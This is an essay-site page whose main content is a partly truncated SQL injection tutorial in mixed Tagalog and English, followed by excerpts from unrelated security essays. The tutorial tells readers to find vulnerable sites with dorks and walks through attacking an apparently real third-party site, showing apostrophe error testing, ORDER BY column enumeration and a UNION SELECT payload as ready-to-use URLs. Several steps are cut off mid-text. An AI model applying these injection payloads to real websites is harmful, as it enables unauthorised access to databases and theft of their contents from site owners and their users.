This website uses cookies to ensure you have the best experience. Learn more

Sql Injection Essay

1392 words - 6 pages

-= What is SQLi? =-

SQL Injection (aka Sql Injection or Structured Query Language Injection)

Is the first step in the entry to exploiting or hacking websites. 

It is easily done and it is a great starting off point. 

SQLi is just basically injecting queries into a database or using queries to get authorization bypass as an admin.

-= PART ONE : WEBSITE ASSESSMENT =-

Bago tayo mag-simula na iexploit ang website ...view middle of the document...

Dapat alam natin exactly what we are injecting into ...view middle of the document...

Ito ang cover ng Part One para kolektain ang lahat ng inpormasyon sa site ...view middle of the document...

-= SECTION ONE : PAGHANAP NG VULNERABLE WEBSITE =-

Paghahanap ng mga vulnerable site ...view middle of the document...

Kailangan gumamit ng "dorks"... ...view middle of the document...

..

Code:
-------------------------------------------------
http://www.evt-me.com/newsDetail.php?id=8
Paano itest ang site kung vulnerable siya sa SQL Injection?

Simple lang maglalagay lang tayo ng appostrophe [ ' ]
sa may hulian ng numero... [ php?id=8' ]

Pwede rin ilagay ang appostrophe [ ' ] between sa equal sign [ = ] at numero... [ php?id='8 ]

Code:
-------------------------------------------------
http://www.evt-me.com/newsDetail.php?id=8'

After niyo malagyan ng appostrophe then ENTER...

Kapag may lumabas na Error, vulnerable ang site sa SQLi...

-= SECTION TWO : PAGTUKOY KUNG ILANG ANG BILANG NG COLUMNS =-

Para malaman kung ilan ang number ng columns...

Magkakaroon tayo ng Trial and Error dito...

Ito ang command na gagamitin "ORDER BY"...

NOTE: SQL walang pakialam kung small or capital letters ang gagamitin...

Ganito siya:

Code:
-------------------------------------------------
http://www.evt-me.com/newsDetail.php?id=8 ORDER BY 1-- [ NO ERROR Or Page Load Normal ]
-------------------------------------------------
http://www.evt-me.com/newsDetail.php?id=8 ORDER BY 2-- [ NO ERROR Or Page Load Normal ]
-------------------------------------------------
http://www.evt-me.com/newsDetail.php?id=8 ORDER BY 3-- [ NO ERROR Or Page Load Normal ]
-------------------------------------------------
http://www.evt-me.com/newsDetail.php?id=8 ORDER BY 4-- [ NO ERROR Or Page Load Normal ]
-------------------------------------------------
http://www.evt-me.com/newsDetail.php?id=8 ORDER BY 5-- [ NO ERROR Or Page Load Normal ]
-------------------------------------------------
http://www.evt-me.com/newsDetail.php?id=8 ORDER BY 6-- [ NO ERROR Or Page Load Normal ]
-------------------------------------------------
http://www.evt-me.com/newsDetail.php?id=8 ORDER BY 7-- [ NO ERROR Or Page Load Normal ]
-------------------------------------------------
http://www.evt-me.com/newsDetail.php?id=8 ORDER BY 8-- [ ERROR! ]
Ibigsahin niyan mayroon pitong [ 7 ] columns...

NOTE: HUWAG KALIMUTANG LAG YAN NG DOUBLE NULL SA HULIAN NG NUMERO OR AFTER THE QUERY [ -- ]...
NAPAKAIMPORTANTE NIYAN...

-= SECTION THREE : PAGHANAP SA VULNERABLE NA COLUMN =-

Alam natin na mayroon tayo na pitong [ 7 ] columns...

So ngayon hahanapin natin kung alin diyan sa pito yung vulnerable column...

Gagawin natin gagamit tayo ng "UNION SELECT" queries...

Syempre huwag kalimutan yung double null [ -- ] sa hulian ng string....

NOTE: LAGAY NG HYPHEN [ - ] BEFORE SA NUMERO...[ php?id=-8 ]

Ganito siya:

Code:
-------------------------------------------------
http://www.evt-me.com/newsDetail.php?id=-8 UNION SELECT 1,2,3,4,5,6,7--

After niyo lagyan ng query may mapapansin kayo na numero...

Yung TWO [ 2 ] ang vulnerable column niya...

At...

Other Essays Like Sql Injection

IS3445 Project Part 1 Essay

759 words - 4 pages attacks that is commonplace are SQL injection and buffer overflow attacks. These attacks can lead to unauthorized administrator access to your e-commerce servers. UNFO will have to comply with PCI DSS standards in their IT infrastructure. These standards will help set up your business to be safe for your customer’s credit card information and privacy. This is not a cure all that will prevent all attacks with everything active security and

Aruba Doc Essay

3327 words - 14 pages Disasters, 3) Technical Failures, 4) Management Failures, 5) Deliberate Acts Attack Methods: 1) Exploiting Software Errors, 2) Social Engineering Methods. Software Vulnerabilities: 1) Insecure interaction between components (cross-site scripting, sql injection), 2) Risky Memory Management (buffer overflow, php file inclusion), 3) Porous defenses (improper access control, missing encryption of sensitive data) Cross-Site: makes you download

Information System Controls for Systems Reliability

5139 words - 21 pages system. Note that buffer overflows can only occur if the programmer failed to include a check on the amount of data being input. Thus, sound programming practices can prevent buffer overflow attacks. Therefore, internal auditors should routinely test all applications developed in-house to be sure that they are not vulnerable to buffer overflow attacks. b. SQL injection Many web pages receive an input or a request from web users and then to

Sec 280 Week 4 Case Study

2410 words - 10 pages from whatever crime that he had done. 28. SQL Injection. SQL injection does not infect the end users directly. It is more towards infecting a website which is vulnerable to this attack. What it does is it will gain unauthorized access to the database and the attacker can retrieve all the valuable information stored in the database. These threats are serious and very malicious in nature. Attackers are continually transforming and adapting the

Adversaries and Ports

4593 words - 19 pages tight firewall that is only allowing ports 443 and ports 80 in. If the website has a portal requiring a password, the adversary could either create a legitimate account in order to find more information. For instance, the “adversary could use a SQL injection in order to see if the network is vulnerable to cross site scripting”1 (displays the fake username). The adversary could then elevate privileges of their fake account so as to become, for

Information Management Chapter 11

1536 words - 7 pages applications. Such practices include sanity checking of variables, accepting all input as strings to be parsed to prevent false data entry, locking down all input fields to controlled lengths to prevent buffer overflows, and hardening of SQL interfaces to prevent injection .Indeed, secure programming may be one of the most important ways by which companies decrease their total attack vectors, and mitigate the damage caused if any of the remaining vectors

Gloabal Perspeives Assments

1586 words - 7 pages handle while keeping to policies and particular laws. A majority of these organized crime groups prey on stealing personal information over the web for personal gain. “Cyber-attacks against large corporations have been widely reported. In July, more than 450,000 usernames and passwords from Yahoo were published on the web. The hacker group D33Ds Company took responsibility for the breach, explaining it had exploited a basic SQL injection

Database Security and Hipaa

4415 words - 18 pages . * Sufficient actions have been taken to guard against SQL Injection. * SQL*Plus is secured using Product Profiles. * Limitations are incorporated in SQL/PLUS for commands such as HOST The Personal-Knowledge Database-Security Policy Understandably, there are many steps that must be taken to turn a basic database into a HIPAA-compliant one.  What works in one environment will depend on what precisely the organization is trying to

Ethical Hacking

5637 words - 23 pages most upto-date information. The 22 domains tested for the CEH exam are as follows: ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● Ethics and legal issues Footprinting Scanning Enumeration System hacking Trojans and backdoors Sniffers Denial of service Social engineering Session hijacking Hacking Web servers Web application vulnerabilities Web-based password-cracking techniques Structured Query Language (SQL) injection Hacking wireless networks

The Separation Of Capital Ownership And Control

1577 words - 7 pages The argument of whether the separation of capital ownership and control is an efficient form of organization has constantly been a controversial issue. The criticism whether the controllers’ act is in the best interest of the owners’ wills never end as long as hired managers operate management. As the number of public companies has been increasing over the course of this century, meanwhile the American style of contact based corporation has

The Versatility And Flexibility Of OLED's

1014 words - 5 pages In April 1, 2002, organic light emitting diodes gain rise in the scientific community with their published, more practical form at Ames Laboratory. “Scientists at the U.S. Department of Energy's Ames Laboratory, in collaboration with scientists at the University of Michigan, Ann Arbor, have developed and demonstrated a novel, fluorescence-based chemical sensor that is more compact, versatile and less expensive than existing technology of its

Related Papers

Sql Injection Essay

7126 words - 29 pages SQL Injection Attack and Defense by: Sagar Joshi, 09/23/2005 http://www.securitydocs.com/library/3655 Web application and SQL Injection Today many business houses and governments and society in general depends a great deal on web applications. All these web applications are accessed using Internet and so face risks associated with usage of Internet. Risks associated with usage of Internet are evident with the increasing number of reported

Lab 3 Assessment Questions Is3350 Essay

665 words - 3 pages within the PCI DSS standard would penetration testing and SQL injection attacks be part of? • Guidance for Requirements 10 and 11: Regularly Monitor and Test Networks. 13. Which requirement definition within the PCI DSS standard would require the creation and implementation of information system security policies • Guidance for Requirement 12: Maintain an Information Security Policy. 14. True or False. CardSystems while having

Http Protocol Essay

559 words - 3 pages never authenticate with a domain that sets a cookie. In turn, this flaw can be exploited by an attacker to set their own rogue cookies and use them later via an HTTPS connection. Thus, a victim will be fooled into using the attacker’s cookie instead of the legitimate Web site cookie. In addition, the attacker in conjunction with other known vulnerabilities in Web servers like SQL Injection, can use its controlled cookie to gain access of

Is4560 Hacking And Countermeasures Essay

3935 words - 16 pages used ___________. a. SQL injection b. command overload c. SQL addition d. database injection 45. What security features should a session have? a. A unique identifier b. Multiple parameters c. Plaintext data storage d. a, b, and c 46. Which of these describes a database security problem that occurs when actions of database users are not properly tracked? a. Unused stored procedures b. Services account privilege problems c